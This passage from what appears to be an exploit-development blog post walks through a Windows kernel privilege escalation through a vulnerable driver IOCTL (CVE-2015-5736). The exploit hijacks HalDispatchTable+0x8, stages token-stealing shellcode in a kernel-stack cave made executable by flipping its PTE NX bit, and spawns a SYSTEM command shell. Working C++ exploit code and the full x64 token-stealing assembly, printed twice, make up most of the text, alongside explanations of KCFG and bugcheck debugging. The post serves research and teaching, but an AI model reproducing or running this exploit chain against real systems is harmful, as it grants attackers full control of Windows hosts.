	if (!ReadProcessMemory(GetCurrentProcess(), (LPVOID)HaliQuerySystemInformation, read_qword, sizeof(ULONGLONG), &read_bytes))
	{
		printf("[!] Error while calling ReadProcessMemory(): %d\n", GetLastError());
	}
	PULONGLONG orig_HaliQuerySystemInformation = (PULONGLONG)((ULONG_PTR*)read_qword);
	printf("[+] Original HaliQuerySystemInformation Address: %llx \n", *orig_HaliQuerySystemInformation);
	((PDWORD64)((DWORD64)fake_stack + 0x10200))[0] = (ULONGLONG)*orig_HaliQuerySystemInformation;

	getchar();
	write_what = (ULONGLONG)shellcode;
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)HaliQuerySystemInformation), &write_what, sizeof(ULONGLONG), NULL);
	_NtQueryIntervalProfile pNtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueryIntervalProfile");
	if (!pNtQueryIntervalProfile)
	{
		printf("[!] Error while resolving NtQueryIntervalProfile: %d\n", GetLastError());
		exit(1);
	}
	ULONG trash;
	pNtQueryIntervalProfile(2, &trash);
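
The save, overwrite, trigger, and restore pattern is easier to see without the kernel in the way. The sketch below is a plain user-mode model of it and touches no kernel structures. dispatch_table stands in for the HalDispatchTable, hook_handler() for the shellcode, and saved_entry for the QWORD parked at fake_stack + 0x10200; all of these names are hypothetical.

```c
#include <stdint.h>

typedef int (*dispatch_fn)(int);

/* Stand-in for the legitimate function behind table slot 1. */
int original_handler(int x) { return x + 1; }

static dispatch_fn saved_entry;   /* where the hook finds the original pointer */
static int hook_calls;            /* counts how often the hook ran */

/* Stand-in for the shellcode: do the extra work, then hand off to the
 * original function so the caller sees normal behavior (the jmp rax). */
int hook_handler(int x)
{
    hook_calls++;
    return saved_entry(x);
}

dispatch_fn dispatch_table[2] = { 0, original_handler };

/* Stand-in for the code path that makes the indirect call through the table. */
int call_through_table(int x) { return dispatch_table[1](x); }

/* Save the entry, overwrite it, trigger one call, then restore it. */
int run_hook_once(int x)
{
    saved_entry = dispatch_table[1];
    dispatch_table[1] = hook_handler;
    int result = call_through_table(x);
    dispatch_table[1] = saved_entry;
    return result;
}

int hook_call_count(void) { return hook_calls; }
```

Calling run_hook_once(41) returns 42 exactly as the unhooked table would, and later calls through the table no longer reach the hook because the entry has been put back.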

This final chunk halts with getchar() to delay execution and then sleeps for 2 seconds, which is a little redundant but ensures a delay if you just click through the prompts. It then uses the write primitive to restore HalDispatchTable+0x08 to HaliQuerySystemInformation and restores the PreviousMode on the KTHREAD before spawning cmd.exe and exiting.

	getchar();
	Sleep(2000);
	//restore the HalDispatchTable
	write_what = (ULONGLONG)*orig_HaliQuerySystemInformation;
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)HaliQuerySystemInformation), &write_what, sizeof(ULONGLONG), NULL);
	//restore Previous Mode on the KThread
	memset(read_qword, 0x00, sizeof(ULONGLONG));
	if (!ReadProcessMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kThread + 0x232), read_qword, sizeof(ULONGLONG), &read_bytes))
	{
		printf("[!] Error while calling ReadProcessMemory(): %d\n", GetLastError());
	}
	PULONGLONG kThreadPM = (PULONGLONG)((ULONG_PTR*)read_qword);
	write_what = (ULONGLONG)*kThreadPM ^ 1 << 0;
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kThread + 0x232), &write_what, sizeof(ULONGLONG), NULL);
	system("start cmd.exe");

	return 0;
}

This token stealing shellcode is in the repo as token_stealing.asm. It finds the EPROCESS of our current process and walks ActiveProcessLinks to find the SYSTEM process with PID 4. It then copies the SYSTEM token over our token. It then restores register values, loads the original HaliQuerySystemInformation address into rax, and performs a jmp rax. This hands execution to HaliQuerySystemInformation, which avoids the bugcheck we would get if we just returned from our shellcode instead of continuing to the legitimate function we hijacked.

_TEXT	SEGMENT

TokenStealing PROC
	get_eproc:
	nop
	nop
	nop
	nop
	nop
	push	rax										;save registers
	push	rcx										;
	push	r9										;
	push	r8										;
	xor     rax, rax								;Get the EPROCESS of current Process
	mov     rax, qword ptr gs:[rax+188h]			;
	mov     rax, qword ptr [rax+0B8h]				;
	mov     r8, rax									;
	parse_eproc:
	mov     rax, qword ptr [rax+448h]				;walk the linked process list to find SYSTEM process
	sub     rax, 448h								;
	mov     rcx, qword ptr [rax+440h]				;
	cmp     rcx, 4									;
	jne     parse_eproc								;
	steal_token:
	mov     r9, qword ptr [rax+4B8h]				;copy SYSTEM process token to current process
	mov     qword ptr [r8+4B8h], r9					;
	pop		r8										;restore registers
	pop		r9										;
	pop		rcx										;
	pop		rax										;we are about to overwrite this one but stack alignment is a thing
	mov		rax, qword ptr [0b60f0200h]				;HaliQuerySystemInformation
	jmp		rax
	ret

TokenStealing ENDP

_TEXT	ENDS

End
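
For readers who find assembly hard to follow, here is a sketch of the same list walk in C. It runs on a simplified, made-up struct rather than the real EPROCESS: fake_eprocess only has the three fields the shellcode touches, and the real offsets (0x440, 0x448, 0x4B8) are replaced by whatever the compiler chooses. All names here are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

struct list_entry { struct list_entry *flink, *blink; };

/* Simplified stand-in for EPROCESS. */
struct fake_eprocess {
    uint64_t pid;               /* UniqueProcessId */
    struct list_entry links;    /* ActiveProcessLinks */
    uint64_t token;             /* Token */
};

/* Same idea as "sub rax, 448h": go from the list entry back to its owner. */
#define PROC_FROM_LINKS(p) \
    ((struct fake_eprocess *)((char *)(p) - offsetof(struct fake_eprocess, links)))

/* Walk the ring starting after current; copy the token of PID 4 if found.
 * Returns 1 on success, 0 if the walk comes back around without a match. */
int steal_system_token(struct fake_eprocess *current)
{
    struct list_entry *e = current->links.flink;
    while (e != &current->links) {
        struct fake_eprocess *p = PROC_FROM_LINKS(e);
        if (p->pid == 4) {
            current->token = p->token;
            return 1;
        }
        e = e->flink;
    }
    return 0;
}

/* Test helper: link an array of processes into a circular list. */
void link_ring(struct fake_eprocess *procs, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        procs[i].links.flink = &procs[(i + 1) % n].links;
        procs[i].links.blink = &procs[(i + n - 1) % n].links;
    }
}
```

Unlike the shellcode, this version stops when it gets back to where it started, so it cannot loop forever if PID 4 is missing from the list.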

If we run this code we will see the VM freeze once it starts performing the HalDispatchTable hijack, and when we switch to the debugger we see a crash with a 0x139 bugcheck. This was confusing to troubleshoot at first because the full dump from !analyze -v mentioned a stack overflow (that detailed dump does not work on my testing VM for this scenario for some reason). The code is actually a KERNEL_SECURITY_CHECK_FAILURE. Arguments 1-3 were null and not relevant in this crash; however, argument 4 showed the user-mode address allocated for the shellcode.

post2-bugcheck-run

post2-windbg-bugcheck

I mentioned earlier in the blog that we are doing this the hard way and that it would be easier to just call the vulnerable CVE-2015-5736 IOCTL again, or double call as I like to call that method. I will briefly go over that to show that this exploit can run shellcode from a user-mode address using other methods, while we troubleshoot why it cannot when we use the HalDispatchTable method. If we use a double call to the CVE-2015-5736 IOCTL, setting the callback to the user-mode address on the second call, we successfully get a SYSTEM command shell without a crash. I’ll save you reading space by not copying the full code here. There are only minor changes in the main() function and the shellcode. You can find the code in the repo: doublecall.cpp and doublecall.asm. Replace the code in the kstack.cpp file with the code from doublecall.cpp and replace the code in token_stealing.asm with the code in doublecall.asm if you want to try it out.

post2-doublecall

We see that we can execute code in kernel-mode from a user-mode memory address if we do the double call to the vulnerable IOCTL so why does it crash if we hijack the HalDispatchTable? Connor McGarr actually gave a talk at BlackHat USA 2025 about CFG (the user-mode version) and KCFG. In it he notes that KCFG acts like software Supervisor Mode Execution Prevention (SMEP). Even if HVCI is disabled KCFG will still act as software SMEP and monitor indirect calls on KCFG protected functions to ensure they never invoke a user-mode address. Connor McGarr BHUSE25

We saw during our RE that KeQueryIntervalProfile had a call to KCFG (guard_dispatch_icall). This monitors the indirect call and since it sees a user-mode address it will initiate a bugcheck and crash the system. This is evident in the call stack (k command in WinDbg). We see from the call stack that nt!KeQueryIntervalProfile+0x3e calls nt!guard_icall_bugcheck+0x1b and then we progress through the bugcheck crash.

post2-ida-kequeryintervalprofile-2

post2-windbg-callstack
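
As a mental model only, the behavior we are hitting can be sketched like this. It is not the real guard_dispatch_icall code, just the outcome described above reduced to one comparison, and it assumes the usual x64 split where kernel addresses start at 0xFFFF800000000000. The function and enum names are hypothetical.

```c
#include <stdint.h>

#define KERNEL_SPACE_START 0xFFFF800000000000ULL   /* start of the upper canonical half */

enum icall_result { ICALL_ALLOWED, ICALL_BUGCHECK };

int is_kernel_address(uint64_t va)
{
    return va >= KERNEL_SPACE_START;
}

/* Conceptual model: with HVCI off, an indirect call through a KCFG protected
 * call site is let through only if the target is a kernel-mode address. */
enum icall_result guard_icall_model(uint64_t target)
{
    return is_kernel_address(target) ? ICALL_ALLOWED : ICALL_BUGCHECK;
}
```

In this model our shellcode at 0x00000002a0000000 ends in ICALL_BUGCHECK no matter what its PTE says, while any target in the kernel half of the address space passes. That is the property the rest of this post relies on.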

So to fix this we either need to pivot to a method that does not go through the KCFG indirect call check or use a kernel-mode address to host our shellcode. We already know we can use another call to fortishield to run our shellcode without KCFG interfering, so we will search for a kernel-mode address to make the HalDispatchTable hijack work. Again, we must remember that HVCI is disabled in this scenario, as it would prevent dynamic code and would not allow kernel memory to be writable and executable at the same time. There is also Mode Based Execution Control (MBEC), a hardware feature of the CPU that prevents executable user-mode addresses from becoming kernel-mode addresses. HVCI and VBS rely on a CPU that supports MBEC to avoid reduced performance, but Windows will not use MBEC if HVCI/VBS are disabled even though it is a hardware-based mitigation. HVCI MBEC

To use a kernel-mode address for our shellcode we must either already know the address or be able to leak it. It needs to be writable and executable. We could use the concept of a code cave, where we find a null page (0x1000 bytes) in the .text section of a module we already have the base address for, which currently means nt and fortishield. We could then use the write primitive to make the page writable, copy our shellcode in, and then use the write primitive again to restore the page to read-only and executable. This could lead to a crash if PatchGuard detects our changes to loaded kernel modules before we are able to make the changes, execute the shellcode, and restore everything back to normal.
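
Searching for a code cave is just a search for a long enough run of zero bytes. Below is a minimal sketch over a local buffer, for example a copy of a module's .text section dumped to disk. find_zero_run() and NO_CAVE are hypothetical names of mine; nothing like this is in the exploit, since we end up using the KSTACK instead.

```c
#include <stddef.h>
#include <stdint.h>

#define NO_CAVE ((size_t)-1)

/* Return the offset of the first run of at least `need` zero bytes in buf,
 * or NO_CAVE if there is no such run. */
size_t find_zero_run(const uint8_t *buf, size_t len, size_t need)
{
    size_t run = 0;

    if (need == 0 || need > len)
        return NO_CAVE;

    for (size_t i = 0; i < len; i++) {
        run = (buf[i] == 0) ? run + 1 : 0;
        if (run == need)
            return i + 1 - need;   /* start of the run that just reached `need` */
    }
    return NO_CAVE;
}
```

To look for a whole null page, need would be 0x1000. To look for just enough room for the shellcode, it would be the shellcode length.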

There is another option though. If we dump our KTHREAD for our exploit in WinDbg and check the stack we can see more than enough unused space towards the stack base to host our shellcode.

post2-windbg-find-kthread

post2-windbg-kstack

Manipulating the KSTACK could cause stability issues or other bugs, but we are only using this executable to run our exploit and elevate our process to SYSTEM by stealing the SYSTEM token. We could write our shellcode close to the base, make it executable, and then write this address to HalDispatchTable+0x8. After elevating our process to SYSTEM we would then restore the KSTACK to non-executable, restore the HalDispatchTable, reset the PreviousMode on our KTHREAD, and spawn a cmd prompt.

We will generate a bugcheck if we attempt to use system("start cmd.exe") without resetting PreviousMode, because system("start cmd.exe") is a user-mode call and our thread is still marked as kernel-mode. We will notice an access violation in WinDbg because the kernel-mode thread tries to access user-mode address space. If we hit g to continue we will hit a continuous loop of access violations. If we set WinDbg to ignore access violations, our exploit just freezes until another process generates a bugcheck due to the kernel being tied up in the endless access violation loop. We can verify this by commenting out line 530:

	//pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kThread + 0x232), &write_what, sizeof(ULONGLONG), NULL);

post2-kstack-crash

post2-windbg-access-violation-1

post2-windbg-settings

post2-windbg-access-violation

post2-windbg-kstack-crash

The working code is mostly the same as the original code until line 429 in the main() function. I will only post from line 429 down here; you can view the full code in the repo kstack.cpp. The logic is mostly the same, except we do not allocate a user-mode address and flip the U/S bit. Instead we read the Kernel Stack Base (StackBase) from the KTHREAD and subtract 0x100 from it. We subtract because the value in StackBase is the address just past the end of the stack, which could be invalid or, if it is valid, belong to something else. Trying to read from or write to an invalid page will cause a bugcheck. If it is a valid address that belongs to another process or thread then there is no telling what issues it will cause. We store the shellcode in our KSTACK code cave and then make that page executable by locating its PTE, just like we did for the user-mode address, and flipping the NX bit instead of the U/S bit. We then perform our HalDispatchTable hijack and call NtQueryIntervalProfile. After our shellcode runs we restore the HalDispatchTable, reset PreviousMode on the KTHREAD to avoid generating a bugcheck when we spawn cmd.exe as SYSTEM, and then exit, thus killing our thread and its KSTACK. There are no changes to the shellcode from the previously listed token_stealing.asm for the bugcheck.cpp earlier in the post. It’s copied below, after the C++ code, so you don’t have to scroll up for it. token_stealing.asm

	ULONGLONG pte_base = (ULONGLONG)*ppte_base;
	_NtWriteVirtualMemory pNtWriteVirtualMemory = (_NtWriteVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory");
	if (!pNtWriteVirtualMemory)
	{
		printf("[!] Error while resolving NtWriteVirtualMemory: %d\n", GetLastError());
		exit(1);
	}
	if (!ReadProcessMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kThread + 0x38), read_qword, sizeof(ULONGLONG), &read_bytes))
	{
		printf("[!] Error while calling ReadProcessMemory(): %d\n", GetLastError());
	}
	PULONGLONG kStack = (PULONGLONG)((ULONG_PTR*)read_qword);
	printf("[+] KSTACK Base Address: %llx \n", *kStack);

	ULONGLONG kStackB = ((ULONGLONG)*kStack - 0x100);
	ULONGLONG* tokensteal = (ULONGLONG*)TokenStealing;
	ULONGLONG write_what = 0;
	// Copy the shellcode into the KSTACK cave one QWORD at a time (12 QWORDs = 0x60 bytes)
	for (int i = 0; i < 12; i++)
	{
		write_what = (ULONGLONG)tokensteal[i];
		pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kStackB + (ULONGLONG)i * 0x08), &write_what, sizeof(ULONGLONG), NULL);
	}
	getchar();
	//Flip NX bit on Kstack
	ULONGLONG kStack_pteva = get_pxe_address_64(kStackB, pte_base);
	if (!ReadProcessMemory(GetCurrentProcess(), (LPVOID)kStack_pteva, read_qword, sizeof(ULONGLONG), &read_bytes))
	{
		printf("[!] Error while calling ReadProcessMemory(): %d\n", GetLastError());
	}
	PULONGLONG kStack_pteEntry = (PULONGLONG)((ULONG_PTR*)read_qword);
	printf("[+] KSTACK PTE Entry: %llx \n", *kStack_pteEntry);
	getchar();
	write_what = (ULONGLONG)*kStack_pteEntry ^ (1ULL << 63);
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kStack_pteva), &write_what, sizeof(ULONGLONG), NULL);

	ULONGLONG HaliQuerySystemInformation = (ULONGLONG)ntBase + 0xc00a68;
	if (!ReadProcessMemory(GetCurrentProcess(), (LPVOID)HaliQuerySystemInformation, read_qword, sizeof(ULONGLONG), &read_bytes))
	{
		printf("[!] Error while calling ReadProcessMemory(): %d\n", GetLastError());
	}
	PULONGLONG orig_HaliQuerySystemInformation = (PULONGLONG)((ULONG_PTR*)read_qword);
	printf("[+] Original HaliQuerySystemInformation Address: %llx \n", *orig_HaliQuerySystemInformation);
	((PDWORD64)((DWORD64)fake_stack + 0x10200))[0] = (ULONGLONG)*orig_HaliQuerySystemInformation;

	getchar();
	write_what = (ULONGLONG)kStackB;
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)HaliQuerySystemInformation), &write_what, sizeof(ULONGLONG), NULL);
	_NtQueryIntervalProfile pNtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueryIntervalProfile");
	if (!pNtQueryIntervalProfile)
	{
		printf("[!] Error while resolving NtQueryIntervalProfile: %d\n", GetLastError());
		exit(1);
	}
	ULONG trash;
	pNtQueryIntervalProfile(2, &trash);
	getchar();
	Sleep(2000);
	//restore the HalDispatchTable
	write_what = (ULONGLONG)*orig_HaliQuerySystemInformation;
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)HaliQuerySystemInformation), &write_what, sizeof(ULONGLONG), NULL);
	//restore Previous Mode on the KThread
	memset(read_qword, 0x00, sizeof(ULONGLONG));
	if (!ReadProcessMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kThread + 0x232), read_qword, sizeof(ULONGLONG), &read_bytes))
	{
		printf("[!] Error while calling ReadProcessMemory(): %d\n", GetLastError());
	}
	PULONGLONG kThreadPM = (PULONGLONG)((ULONG_PTR*)read_qword);
	write_what = (ULONGLONG)*kThreadPM ^ 1 << 0;
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kThread + 0x232), &write_what, sizeof(ULONGLONG), NULL);
	system("start cmd.exe");

	return 0;

}
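
Two assumptions are baked into the code above: the shellcode fits in the 0x100 bytes below StackBase, and it sits entirely inside one page, because we only flip the NX bit in a single PTE. The sketch below spells those checks out. The helper names are hypothetical and the stack base in the usage note is a made-up, page-aligned value.

```c
#include <stdint.h>

#define PTE_NX    (1ULL << 63)   /* needs a 64-bit constant: plain 1 << 63 overflows an int */
#define PAGE_MASK 0xFFFULL

/* Clear the NX bit so the page becomes executable. */
uint64_t pte_make_executable(uint64_t pte)
{
    return pte & ~PTE_NX;
}

/* Number of 8-byte writes needed to copy payload_len bytes. */
uint64_t qwords_needed(uint64_t payload_len)
{
    return (payload_len + 7) / 8;
}

/* The cave starts back_off bytes below stack_base. It is usable if the
 * payload ends at or before stack_base and does not cross a page boundary. */
int cave_is_safe(uint64_t stack_base, uint64_t back_off, uint64_t payload_len)
{
    if (back_off == 0 || payload_len == 0 || payload_len > back_off)
        return 0;
    if (back_off > stack_base)
        return 0;

    uint64_t start = stack_base - back_off;
    uint64_t last = start + payload_len - 1;
    return (start & ~PAGE_MASK) == (last & ~PAGE_MASK);
}
```

With a stack base of 0xffffb18f1a2b7000, a back_off of 0x100 and the 0x60 bytes the code writes, cave_is_safe() returns 1 and qwords_needed() returns 12, matching the twelve QWORD writes used to copy the shellcode. Moving the cave to 0x1010 bytes below the base would make the payload straddle two pages, and only one of them would have NX cleared.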

_TEXT	SEGMENT

TokenStealing PROC
	get_eproc:
	nop
	nop
	nop
	nop
	nop
	push	rax										;save registers
	push	rcx										;
	push	r9										;
	push	r8										;
	xor     rax, rax								;Get the EPROCESS of current Process
	mov     rax, qword ptr gs:[rax+188h]			;
	mov     rax, qword ptr [rax+0B8h]				;
	mov     r8, rax									;
	parse_eproc:
	mov     rax, qword ptr [rax+448h]				;walk the linked process list to find SYSTEM process
	sub     rax, 448h								;
	mov     rcx, qword ptr [rax+440h]				;
	cmp     rcx, 4									;
	jne     parse_eproc								;
	steal_token:
	mov     r9, qword ptr [rax+4B8h]				;copy SYSTEM process token to current process
	mov     qword ptr [r8+4B8h], r9					;
	pop		r8										;restore registers
	pop		r9										;
	pop		rcx										;
	pop		rax										;we are about to overwrite this one but stack alignment is a thing
	mov		rax, qword ptr [0b60f0200h]				;HaliQuerySystemInformation
	jmp		rax
	ret

TokenStealing ENDP

_TEXT	ENDS

End

And for our hard work we receive a nice SYSTEM command shell.

post2-kstack-success